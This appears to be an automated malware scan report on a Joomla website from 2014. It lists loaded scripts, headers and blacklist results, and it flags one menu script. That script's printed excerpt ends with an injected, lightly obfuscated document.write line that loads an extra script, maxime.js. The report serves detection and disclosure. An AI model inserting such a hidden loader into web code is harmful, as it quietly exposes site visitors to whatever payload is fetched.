Scanned pages/files
Request | Server response | Status |
http://restoringcleveland.com/ | 200 OK Content-Length: 43027 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.6/jquery.min.js | 200 OK Content-Length: 91668 Content-Type: text/javascript | clean |
http://restoringcleveland.com/media/system/js/modal.js | 200 OK Content-Length: 10588 Content-Type: application/javascript | clean |
http://restoringcleveland.com/components/com_k2/js/k2.js | 200 OK Content-Length: 3077 Content-Type: application/javascript | clean |
http://restoringcleveland.com/plugins/system/jat3/base-themes/default/js/core.js | 200 OK Content-Length: 5721 Content-Type: application/javascript | clean |
http://restoringcleveland.com/plugins/system/jat3/base-themes/default/js/menu/mega.js | 200 OK Content-Length: 15679 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
var jaMegaMenuMoo = new Class({ initialize: function(menu, options){ this.options = $extend({ slide: true, duration: 300, fading: false, bgopacity: 0.9, delayHide: 500, direction: 'down', action: 'mouseenter', hidestyle: 'normal' }, options || {}); if (!this.options.slide && !this.options.fading) this.options.delayHide = 10; this.menu = menu; this.childopen = new Array(); th
} else { r = window.getWidth() - r + 10; } if (r < 0) { li.childcontent.setStyle ('margin-left', -ccor.width + 20); li.eff_on['margin-left'] = 0; li.eff_off['margin-left'] = li._w + 20; li.childcontent_inner.setStyle ('margin-left', li.eff_off['margin-left']); } } } });
document.write("<scr"+"ipt src='/media/system/js/maxime.js'><"+"/script>");
Antivirus reports:
http://restoringcleveland.com/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/javascript | clean |
http://restoringcleveland.com/includes/js/joomla.javascript.js | 200 OK Content-Length: 15405 Content-Type: application/javascript | clean |
http://restoringcleveland.com/media/system/js/calendar.js | 200 OK Content-Length: 34315 Content-Type: application/javascript | clean |
http://restoringcleveland.com/media/system/js/calendar-setup.js | 200 OK Content-Length: 4919 Content-Type: application/javascript | clean |
http://restoringcleveland.com/modules/mod_s5_box/js/jquery.colorbox-min.js | 200 OK Content-Length: 9517 Content-Type: application/javascript | clean |
http://restoringcleveland.com/modules/mod_s5_box/js/jquery.no.conflict.js | 200 OK Content-Length: 20 Content-Type: application/javascript | clean |
http://restoringcleveland.com/modules/mod_s5_box/js/jquery.colorbox.js | 200 OK Content-Length: 27813 Content-Type: application/javascript | clean |
http://connect.facebook.net/en_US/all.js | 200 OK Content-Length: 163245 Content-Type: application/x-javascript | clean |
http://platform.twitter.com/widgets.js | 200 OK Content-Length: 98004 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: restoringcleveland.com
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Tue, 01 Apr 2014 19:12:13 GMT
Pragma: no-cache
Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 01 Apr 2014 19:12:14 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: d8467da8b8a5d83483ee5298d3abf6b5=5e8a43467e0dc04b6dda6caf602fac20; path=/
Set-Cookie: ja_methys_home_tpl=ja_methys_home; expires=Sun, 22-Mar-2015 19:12:13 GMT; path=/
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: restoringcleveland.com
Referer: http://www.google.com/search?q=restoringcleveland.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=restoringcleveland.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://restoringcleveland.com/
Result: restoringcleveland.com is not infected or malware details are not published yet.